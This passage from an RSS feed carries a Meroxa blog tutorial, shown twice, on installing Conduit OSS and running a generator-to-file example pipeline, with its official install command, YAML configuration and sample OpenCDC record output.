the flexibility to handle structured, scalable data in real time. By the end, readers will have a fully functioning pipeline ready to deliver actionable insights and the foundational knowledge to explore advanced configurations. Whether you're new to real-time data or looking for a reliable integration tool, this guide demonstrates how Conduit makes real-time pipelines accessible to everyone.]]></description><link>https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 13 Jan 2025 12:58:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines have become essential for modern applications, enabling businesses to process and analyze data instantly for critical decision-making. For beginners and developers, getting started with real-time pipelines may seem daunting, but with Conduit OSS (open source), it’s easier than ever to build a seamless and reliable data stream.&lt;/p&gt;
&lt;p&gt;This guide will walk you through the process of building your first real-time data pipeline using Meroxa’s Conduit OSS tool from setup to deployment. By the end, you’ll have a functioning pipeline that ingests, processes, and delivers data in real time.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What is Conduit?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ease of Use&lt;/strong&gt;: Set up pipelines with intuitive configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Move data instantly between systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle large data volumes effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Integrate with multiple data sources and sinks.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Install Conduit&lt;/h2&gt;
&lt;p&gt;If you&apos;re using a macOS or Linux system, you can install Conduit with the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ curl https://conduit.io/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you&apos;re not using macOS or Linux system, you can still install Conduit following one of the different options provided in &lt;a href=&quot;https://conduit.io/docs/installing-and-running&quot;&gt;our installation page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;note&lt;/p&gt;
&lt;p&gt;The Conduit binary contains both, the Conduit service and the Conduit CLI, with which you can interact with Conduit.&lt;/p&gt;
&lt;h2&gt;Initialize Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#initialize-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;First, let&apos;s initialize the working environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you can put your pipeline configuration files, connector binaries, and processor binaries. There&apos;s also a &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;p&gt;In this guide, we&apos;ll only use the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, since we won&apos;t need to install any additional connectors or change Conduit&apos;s default configuration.&lt;/p&gt;
&lt;h2&gt;Build a pipeline&lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, we can use the Conduit CLI to build the example pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit pipelines init&lt;/code&gt; builds an example that generates flight information from an imaginary airport every second. Use &lt;code class=&quot;language-text&quot;&gt;conduit pipelines init --help&lt;/code&gt; to learn how to customize the pipeline.&lt;/p&gt;
&lt;p&gt;If the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, you&apos;ll notice a new file, &lt;code class=&quot;language-text&quot;&gt;pipeline-generator-to-file.yaml&lt;/code&gt; that contains our pipeline&apos;s configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator-to-file&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;airline&apos; of type string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.airline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;string&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;scheduledDeparture&apos; of type &apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.scheduledDeparture&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The format of the generated payload data (raw, structured, file).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;structured&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The maximum rate in records per second, at which records are&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# generated (0 means no rate limit).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: float&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;1&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Path is the file path used by the connector to read/write records.&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;./destination.txt&apos;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically ( &lt;code class=&quot;language-text&quot;&gt;status: running&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Then we see a source connector, that uses the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; plugin&lt;/a&gt;, which is a built-in plugin that can generate random data. The source connector&apos;s settings translate into: generate structured data, 1 record per second. Each generated record should contain an &lt;code class=&quot;language-text&quot;&gt;airline&lt;/code&gt; field (type: string) and a &lt;code class=&quot;language-text&quot;&gt;scheduledDeparture&lt;/code&gt; field (type: duration).&lt;/p&gt;
&lt;p&gt;What follows is a destination connector where the data will be written to. It uses the &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt; plugin, which is a built-in plugin that writes all the incoming data to a file. It has only one configuration parameter, which is the path to the file where the records will be written.&lt;/p&gt;
&lt;h2&gt;Run Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#run-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With the pipeline configuration being ready, we can run Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit is now running the pipeline. Let&apos;s check the contents of the &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; using:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;tail -f destination.txt | jq
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every second, you should a JSON object like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;position&quot;: &quot;MjU=&quot;,
  &quot;operation&quot;: &quot;create&quot;,
  &quot;metadata&quot;: {
    &quot;conduit.source.connector.id&quot;: &quot;example-pipeline:example-source&quot;,
    &quot;opencdc.createdAt&quot;: &quot;1730801194148460912&quot;,
    &quot;opencdc.payload.schema.subject&quot;: &quot;example-pipeline:example-source:payload&quot;,
    &quot;opencdc.payload.schema.version&quot;: &quot;1&quot;
  },
  &quot;key&quot;: &quot;cHJlY2VwdG9yYWw=&quot;,
  &quot;payload&quot;: {
    &quot;before&quot;: null,
    &quot;after&quot;: {
      &quot;airline&quot;: &quot;wheelmaker&quot;,
      &quot;scheduledDeparture&quot;: &quot;2024-11-05T10:06:34.148469Z&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The JSON object you see is the &lt;a href=&quot;https://conduit.io/docs/using/opencdc-record&quot;&gt;OpenCDC record&lt;/a&gt; that holds the data being streamed as well as other data and metadata. In the &lt;code class=&quot;language-text&quot;&gt;.payload.after&lt;/code&gt; field you will see the user data that was generated by the &lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;airline&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;wheelmaker&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;scheduledDeparture&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2024-11-05T10:06:34.148469Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The pipeline will keep streaming the data from the generator source connector to the file destination connector as long as Conduit is running. To stop Conduit, press &lt;code class=&quot;language-text&quot;&gt;Ctrl + C&lt;/code&gt; (on a Linux OS, or the equivalent on other operating systems). This will trigger a graceful shutdown that stops reads from source connectors and waits for records that are still in the pipeline to be acknowledged. The next time Conduit starts, it will start reading data from where it stopped.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building a real-time pipeline with Meroxa’s Conduit OSS is straightforward, even for beginners. By following this guide, you’ve set up a reliable and scalable pipeline that delivers real-time insights. Ready to explore more? Check out Conduit’s &lt;a href=&quot;https://conduit.io/docs&quot;&gt;documentation&lt;/a&gt; for advanced configurations and integrations.&lt;/p&gt;
&lt;p&gt;Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;request a demo.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide]]></title><description><![CDATA[This blog provides a comprehensive, beginner-friendly guide to building your first real-time data pipeline using Meroxa’s open-source Conduit platform. Designed to simplify real-time data integration, Conduit empowers developers to move data seamlessly between systems with minimal setup. The guide walks readers through the installation, initialization, pipeline configuration, and execution steps. Starting with a sample pipeline that streams generated data to a destination file, it showcases Conduit’s intuitive configuration process and highlights the flexibility to handle structured, scalable data in real time. By the end, readers will have a fully functioning pipeline ready to deliver actionable insights and the foundational knowledge to explore advanced configurations. Whether you're new to real-time data or looking for a reliable integration tool, this guide demonstrates how Conduit makes real-time pipelines accessible to everyone.]]></description><link>https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 13 Jan 2025 12:58:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines have become essential for modern applications, enabling businesses to process and analyze data instantly for critical decision-making. For beginners and developers, getting started with real-time pipelines may seem daunting, but with Conduit OSS (open source), it’s easier than ever to build a seamless and reliable data stream.&lt;/p&gt;
&lt;p&gt;This guide will walk you through the process of building your first real-time data pipeline using Meroxa’s Conduit OSS tool from setup to deployment. By the end, you’ll have a functioning pipeline that ingests, processes, and delivers data in real time.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What is Conduit?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ease of Use&lt;/strong&gt;: Set up pipelines with intuitive configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Move data instantly between systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle large data volumes effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Integrate with multiple data sources and sinks.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Install Conduit&lt;/h2&gt;
&lt;p&gt;If you&apos;re using a macOS or Linux system, you can install Conduit with the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ curl https://conduit.io/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you&apos;re not using macOS or Linux system, you can still install Conduit following one of the different options provided in &lt;a href=&quot;https://conduit.io/docs/installing-and-running&quot;&gt;our installation page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;note&lt;/p&gt;
&lt;p&gt;The Conduit binary contains both, the Conduit service and the Conduit CLI, with which you can interact with Conduit.&lt;/p&gt;
&lt;h2&gt;Initialize Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#initialize-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;First, let&apos;s initialize the working environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you can put your pipeline configuration files, connector binaries, and processor binaries. There&apos;s also a &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;p&gt;In this guide, we&apos;ll only use the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, since we won&apos;t need to install any additional connectors or change Conduit&apos;s default configuration.&lt;/p&gt;
&lt;h2&gt;Build a pipeline&lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, we can use the Conduit CLI to build the example pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit pipelines init&lt;/code&gt; builds an example that generates flight information from an imaginary airport every second. Use &lt;code class=&quot;language-text&quot;&gt;conduit pipelines init --help&lt;/code&gt; to learn how to customize the pipeline.&lt;/p&gt;
&lt;p&gt;If the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, you&apos;ll notice a new file, &lt;code class=&quot;language-text&quot;&gt;pipeline-generator-to-file.yaml&lt;/code&gt; that contains our pipeline&apos;s configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator-to-file&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;airline&apos; of type string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.airline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;string&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;scheduledDeparture&apos; of type &apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.scheduledDeparture&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The format of the generated payload data (raw, structured, file).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;structured&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The maximum rate in records per second, at which records are&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# generated (0 means no rate limit).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: float&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;1&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Path is the file path used by the connector to read/write records.&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;./destination.txt&apos;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically ( &lt;code class=&quot;language-text&quot;&gt;status: running&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Then we see a source connector, that uses the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; plugin&lt;/a&gt;, which is a built-in plugin that can generate random data. The source connector&apos;s settings translate into: generate structured data, 1 record per second. Each generated record should contain an &lt;code class=&quot;language-text&quot;&gt;airline&lt;/code&gt; field (type: string) and a &lt;code class=&quot;language-text&quot;&gt;scheduledDeparture&lt;/code&gt; field (type: duration).&lt;/p&gt;
&lt;p&gt;What follows is a destination connector where the data will be written to. It uses the &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt; plugin, which is a built-in plugin that writes all the incoming data to a file. It has only one configuration parameter, which is the path to the file where the records will be written.&lt;/p&gt;
&lt;h2&gt;Run Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#run-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With the pipeline configuration being ready, we can run Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit is now running the pipeline. Let&apos;s check the contents of the &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; using:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;tail -f destination.txt | jq
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every second, you should a JSON object like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;position&quot;: &quot;MjU=&quot;,
  &quot;operation&quot;: &quot;create&quot;,
  &quot;metadata&quot;: {
    &quot;conduit.source.connector.id&quot;: &quot;example-pipeline:example-source&quot;,
    &quot;opencdc.createdAt&quot;: &quot;1730801194148460912&quot;,
    &quot;opencdc.payload.schema.subject&quot;: &quot;example-pipeline:example-source:payload&quot;,
    &quot;opencdc.payload.schema.version&quot;: &quot;1&quot;
  },
  &quot;key&quot;: &quot;cHJlY2VwdG9yYWw=&quot;,
